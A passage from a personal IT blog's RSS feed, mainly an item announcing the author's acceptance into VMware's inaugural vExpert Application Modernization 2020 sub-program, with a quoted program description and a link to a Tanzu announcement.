			<slash:comments>0</slash:comments>
		
		
		<image>https://thefluffyadmin.net/wp-content/uploads/2021/01/EsQHvvWXUAEe5_S-1.jpg</image><post-id xmlns="com-wordpress:feed-additions:1">1608</post-id>	</item>
		<item>
		<title>VMware vExpert sub-program: Application Modernization 2020</title>
		<link>https://thefluffyadmin.net/?p=1602</link>
					<comments>https://thefluffyadmin.net/?p=1602#respond</comments>
		
		<dc:creator><![CDATA[Thefluffyadmin]]></dc:creator>
		<pubDate>Fri, 25 Sep 2020 16:22:09 +0000</pubDate>
				<category><![CDATA[Career, Training and Personal Development]]></category>
		<category><![CDATA[cloud-native]]></category>
		<category><![CDATA[vexpert]]></category>
		<category><![CDATA[vmware]]></category>
		<guid isPermaLink="false">https://thefluffyadmin.net/?p=1602</guid>

					<description><![CDATA[Very honored to have been accepted into the inaugural VMware vExpert sub-program: Application Modernization 2020 Individuals who are awarded Application Modernization vExpert status are the cream of the crop when it comes to application modernization knowledge, including platforms that modern applications run on. They’re advocates of VMware Tanzu—a portfolio of VMware products and services for <br><a class="read-more-button" href="https://thefluffyadmin.net/?p=1602">Read More &#187;</a>]]></description>
										<content:encoded><![CDATA[<p><span class="break-words"><span dir="ltr">Very honored to have been accepted into the inaugural VMware vExpert sub-program: Application Modernization 2020<br />
</span></span></p>
<blockquote><p><em><span class="break-words"><span dir="ltr">Individuals who are awarded Application Modernization vExpert status are the cream of the crop when it comes to application modernization knowledge, including platforms that modern applications run on. They’re advocates of VMware Tanzu—a portfolio of VMware products and services for modernizing applications and infrastructure—as well as other application platforms running on VMware solutions. vExperts love “giving back” to the community by sharing their knowledge with their peers, whether through blogging or speaking at events like VMworld and VMUG.</span></span></em></p>
<p><img loading="lazy" decoding="async" id="ember2963" class="ivm-view-attr__img--centered feed-shared-image__image lazy-image ember-view" src="https://media-exp1.licdn.com/dms/image/C4D22AQHvPVbmBqoM1Q/feedshare-shrink_800-alternative/0?e=1603929600&amp;v=beta&amp;t=wbBS6cNXghRIDjs8Pfl2Xa1Xy9CNHQmQt0HOuLFTJjc" alt="No alternative text description for this image" width="600" height="395" /></p></blockquote>
<p>Read more:<br />
<a href="https://tanzu.vmware.com/content/blog/announcing-the-vmware-application-modernization-vexpert-program-2020">https://tanzu.vmware.com/content/blog/announcing-the-vmware-application-modernization-vexpert-program-2020</a></p>
]]></content:encoded>
					
					<wfw:commentRss>https://thefluffyadmin.net/?feed=rss2&#038;p=1602</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<image>https://thefluffyadmin.net/wp-content/uploads/2020/09/vexpert-am-2020-badge.png</image><post-id xmlns="com-wordpress:feed-additions:1">1602</post-id>	</item>
	</channel>
</rss>
